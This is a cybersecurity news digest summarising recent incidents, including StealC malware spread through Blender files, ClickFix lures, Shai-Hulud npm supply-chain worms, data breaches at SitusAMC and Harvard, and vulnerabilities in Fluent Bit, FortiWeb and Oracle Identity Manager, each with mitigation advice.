Daily Brief

A Russian-associated operation is distributing StealC V2 malware via malicious Blender files on 3D model marketplaces like CGTrader, targeting users of the open-source 3D creation suite. The attack exploits Blender's Auto Run feature, using Python scripts embedded in .blend files to initiate a malware loader from a Cloudflare Workers domain. The loader retrieves a PowerShell script, which downloads two ZIP archives containing the StealC infostealer and an auxiliary Python stealer for redundancy, enhancing persistence. Researchers from Morphisec noted that this StealC variant, undetected by VirusTotal, expands data-stealing capabilities, posing a challenge for antivirus solutions. Users are advised to disable Blender's auto-execution of scripts and treat 3D assets as executable files, utilizing sandboxed environments for safer testing. This campaign underscores the importance of cautious file handling and the need for improved scrutiny of user-submitted content on digital marketplaces.

Cybercriminals are deploying ClickFix attacks, using fake Windows Update screens to trick users into executing malicious commands via the Windows Command Prompt. The attack employs social engineering tactics, convincing users to run commands that lead to malware execution, specifically targeting all user tiers with high effectiveness. Recent variants of ClickFix drop LummaC2 and Rhadamanthys information stealers, using steganography to hide the payload within PNG images. The attack process involves multiple stages, utilizing PowerShell and .NET assemblies to reconstruct the malware from encrypted images. Researchers identified dynamic evasion tactics, such as ctrampoline, to avoid detection, complicating the malware's execution path. A law enforcement operation, Operation Endgame, disrupted part of the infrastructure, halting payload delivery on compromised domains as of November 13. Security experts recommend disabling the Windows Run box and monitoring suspicious processes to mitigate risks associated with ClickFix attacks.

A coalition of 86 cybersecurity leaders, including former CISA officials, launched Hacklore.org to combat outdated cybersecurity myths and promote effective security practices. The initiative aims to replace "hacklore" with actionable advice, emphasizing patch installations, software updates, strong passwords, and multi-factor authentication. Outdated advice, such as avoiding public Wi-Fi and frequent password changes, is deemed misleading and often counterproductive. The site encourages organizations to adopt phishing-resistant MFA and develop systems resilient to human error, reducing the impact of employee mistakes. The initiative calls for software manufacturers to build secure-by-design products and maintain transparency in vulnerability disclosures. Security leaders urge a shift from catchy but inaccurate advice to guidance that genuinely mitigates cybersecurity risks. The effort seeks to align cybersecurity practices with actual threat landscapes, particularly ahead of high-risk periods like Cyber Monday and holiday travel.

SitusAMC, a key player in real-estate finance services, reported a data breach affecting client and customer information, discovered in early November 2025. The breach impacted accounting records and legal agreements of clients, including major banks like Citi, Morgan Stanley, and JPMorgan Chase. SitusAMC confirmed that no encrypting malware was involved, and business operations remain unaffected, ensuring continuity for its extensive client base. The company initiated an investigation with external cybersecurity experts and is directly communicating with affected clients to assess the breach's scope. Notifications to clients began on November 16, with ongoing updates provided as the investigation progresses, indicating a transparent response strategy. The full extent of the breach remains uncertain due to the complexity of the data involved, with efforts underway to identify all affected parties. Financial institutions potentially impacted by the breach have yet to comment on the situation, leaving questions about the broader implications for their customers.

Oligo Security identified five critical vulnerabilities in Fluent Bit, an open-source log collection tool, affecting major cloud providers like Google, Amazon, and Microsoft. These vulnerabilities, present for years, allow attackers to bypass authentication, perform path traversal, and achieve remote code execution, posing significant risks to cloud environments. The flaws include CVE-2025-12972, a path traversal vulnerability, and CVE-2025-12970, a stack buffer overflow, both enabling potential remote code execution. Fluent Bit's widespread use, with over 15 billion deployments, amplifies the potential impact, as it is integral to data collection in cloud and AI environments. Affected organizations are urged to update to Fluent Bit version 4.1.1 or 4.0.12 to mitigate these security threats. The disclosure process involved collaboration with AWS and highlighted the need for improved security reporting and CVE assignment for open-source projects. The incident underscores the importance of securing open-source infrastructure and fostering cooperation among maintainers, cloud providers, and security researchers.

Researchers identified five vulnerabilities in Fluent Bit, a telemetry agent, enabling potential remote code execution and infrastructure intrusions in cloud environments. Exploitation risks include bypassing authentication, path traversal, denial-of-service, and data manipulation, impacting cloud and Kubernetes infrastructures. Attackers could use these flaws to execute malicious code, alter event logs, and inject misleading telemetry data, complicating incident response efforts. The vulnerabilities have been addressed in Fluent Bit versions 4.1.1 and 4.0.12, with AWS urging customers to update for enhanced protection. Recommended security measures include restricting dynamic tag use, securing output paths, and enforcing read-only configurations to mitigate risks. Fluent Bit's widespread enterprise use amplifies the potential impact, risking service disruptions and data integrity issues if unpatched. This discovery follows previous vulnerabilities in Fluent Bit, emphasizing the need for continuous monitoring and timely patch management.

Traditional tools like SCCM and WSUS struggle to maintain patch compliance in hybrid work environments, leading to extended vulnerability periods and increased security risks. SCCM's reliance on deprecated WSUS technology presents challenges, including maintenance issues and synchronization failures, which hinder timely patch deployment. Cloud-native patch management solutions offer seamless updates over the internet, eliminating dependency on corporate networks and VPNs, thus enhancing patch consistency. Organizations adopting modern patching strategies report reduced breach likelihood, lower cyber-insurance costs, and improved compliance metrics. Legacy systems incur significant hidden costs due to maintenance of servers, databases, and VPN troubleshooting, while cloud-native solutions streamline operations and reduce overhead. By automating patch management and providing real-time visibility, cloud-native tools align IT and security priorities, ensuring predictable security outcomes. As hybrid work becomes the norm, transitioning to cloud-native patching is a strategic decision for risk management and maintaining robust security postures.

SitusAMC, a real estate finance firm, experienced a data breach, with confidential client data, including accounting records and legal agreements, stolen in the intrusion. The breach, confirmed on November 15, did not involve ransomware, but the full extent of the compromised data is still under investigation. Major banks such as Citi, JPMorgan Chase, and Morgan Stanley were potentially affected, though specific client details remain undisclosed. SitusAMC is collaborating with federal law enforcement and cybersecurity experts to investigate the breach and enhance system security. Immediate steps included resetting staff credentials, disabling remote access tools, updating firewall rules, and improving security settings. The FBI is involved in the investigation, affirming that SitusAMC's services continue to operate without disruption. With a global client base exceeding 1,500, SitusAMC's breach underscores the potential widespread impact on the financial sector. The company is actively working to determine the affected products and services, promising updates as more information becomes available.

A new supply-chain attack involving Shai-Hulud malware has compromised over 500 npm packages, targeting developer and CI/CD secrets with encoded leaks to GitHub. The campaign, initially detected in mid-September, has expanded rapidly, affecting thousands of packages and involving around 350 compromised maintainer accounts. Malicious scripts were injected into package.json files, exploiting compromised maintainer accounts to distribute trojanized packages on npm. Security researchers identified the malware's use of TruffleHog for secret theft and extreme obfuscation techniques to evade detection. GitHub is actively removing repositories created by the attackers, but new ones are emerging at a fast pace, complicating mitigation efforts. Affected developers are advised to downgrade to safe package versions, rotate secrets, and disable npm postinstall scripts to mitigate risks. The attack coincides with GitHub's gradual implementation of enhanced security measures to counteract supply-chain threats on npm.

A new variant of the Shai-Hulud worm has compromised over 25,000 GitHub repositories by exploiting npm packages, affecting developers globally within a few days. Key affected packages include those from Zapier, AsyncAPI, ENS Domains, PostHog, and Postman, which experience high download volumes weekly. The malware scans infected systems for AWS, GCP, Azure, and GitHub credentials, publishing them to the users' own repositories, significantly impacting security. GitHub is actively removing compromised repositories, but the rapid spread of the worm poses a significant challenge to containment efforts. The worm executes during the pre-install phase, increasing exposure risks in build and runtime environments, a notable change from previous versions. Security teams are advised to clear npm caches, roll back dependencies, rotate credentials, and monitor for indicators of compromise to mitigate risks. GitHub and npm are enhancing security measures, including transitioning to FIDO-based authentication and revoking classic tokens, to protect against future supply chain attacks.

Harvard University reported a data breach affecting its Alumni Affairs and Development systems, compromising personal data of students, alumni, donors, staff, and faculty. The breach, resulting from a voice phishing attack, exposed email addresses, phone numbers, addresses, and event attendance records but did not involve sensitive financial data. University officials, including the Vice President for Alumni Affairs and Development, confirmed that Social Security numbers and payment information were not compromised. Harvard is collaborating with law enforcement and cybersecurity experts to investigate the breach and has notified affected individuals to remain vigilant against potential phishing attempts. The university has taken immediate action to secure its systems and prevent further unauthorized access, advising caution against suspicious communications requesting sensitive information. This incident follows a recent claim by the Clop ransomware group of breaching Harvard's systems through a zero-day vulnerability, highlighting ongoing cybersecurity challenges. The breach is part of a broader trend, with other Ivy League institutions like Princeton and the University of Pennsylvania also experiencing similar data breaches recently.

The FCC has repealed telecom cybersecurity rules established after the China-linked Salt Typhoon espionage campaign, citing them as "unlawful and ineffective." The decision was made in a 2-1 vote, with dissenting voices warning that this could weaken national security against state-sponsored cyber threats. The original rules aimed to secure telecom networks, particularly those involved in lawful intercept functions, following significant breaches by state-backed actors. The FCC claims telecom providers have improved cybersecurity measures voluntarily, thus rendering the formal rules unnecessary. Critics argue that without enforceable standards, the U.S. remains vulnerable to future breaches, lacking a framework to ensure compliance and security. The FCC plans to adopt a more flexible approach, relying on industry cooperation and targeted rules for specific areas like submarine cable security. Concerns persist about smaller carriers' ability to maintain robust security without mandatory guidelines, potentially leaving gaps for exploitation.

A second wave of the Sha1-Hulud campaign has compromised over 25,000 npm repositories, executing malicious code during the preinstall phase to steal credentials. The attack utilizes a new variant that targets build and runtime environments, publishing stolen secrets to GitHub with the description "Sha1-Hulud: The Second Coming." Attackers leverage compromised maintainer accounts to distribute trojanized npm packages, executing credential theft and exfiltration during installation. The malicious payload registers infected machines as self-hosted runners, allowing arbitrary command execution and exfiltration of sensitive data. Over 350 unique users have been affected, with new repositories being compromised at a rapid pace, adding 1,000 new instances every 30 minutes. Security firms recommend immediate scanning of endpoints, removal of compromised packages, credential rotation, and auditing of GitHub workflows for suspicious activity. The campaign's escalation includes a wiper-like function that destroys data if credential theft fails, marking a shift from data theft to punitive sabotage.

Fortinet disclosed a medium-severity vulnerability in FortiWeb, CVE-2025-58034, which has been actively exploited in the wild, affecting systems with a CVSS score of 6.7. The vulnerability allows authenticated attackers to execute unauthorized code via crafted HTTP requests or CLI commands, posing significant security risks to affected systems. Fortinet's response included patching the flaw in version 8.0.2, but the company faced criticism for its delayed disclosure and handling of the issue. Another critical vulnerability, CVE-2025-64446, with a CVSS score of 9.1, was patched silently, raising concerns about transparency and communication with stakeholders. Security firm Orange Cyberdefense reported exploitation campaigns chaining both vulnerabilities to facilitate authentication bypass and command injection. The staggered disclosure of these vulnerabilities raises questions about Fortinet's strategy to manage patch deployment and alert threat actors. Organizations using FortiWeb are urged to apply the latest patches promptly to mitigate potential exploitation risks and ensure system integrity.

CISA has directed U.S. federal agencies to patch a critical Oracle Identity Manager vulnerability, CVE-2025-61757, by December 12, following signs of active exploitation. The flaw allows unauthenticated attackers with network access to completely compromise Oracle Identity Manager, posing significant security risks. Searchlight Cyber researchers have detailed the vulnerability, describing it as "trivial" to exploit, involving a single HTTP request to bypass authentication. Evidence suggests the vulnerability was exploited as a zero-day, with attack logs indicating activity from August 30 to September 9, prior to Oracle's patch release. Oracle's October advisory rated the issue as critical but did not confirm zero-day exploitation, raising concerns over the transparency of their vulnerability disclosures. The urgency of the patch is compounded by Oracle's previous security challenges, including a major breach by the Clop ransomware group earlier this year. Federal agencies face compliance consequences if the patch is not applied by the deadline, emphasizing the critical need for timely updates and robust security practices.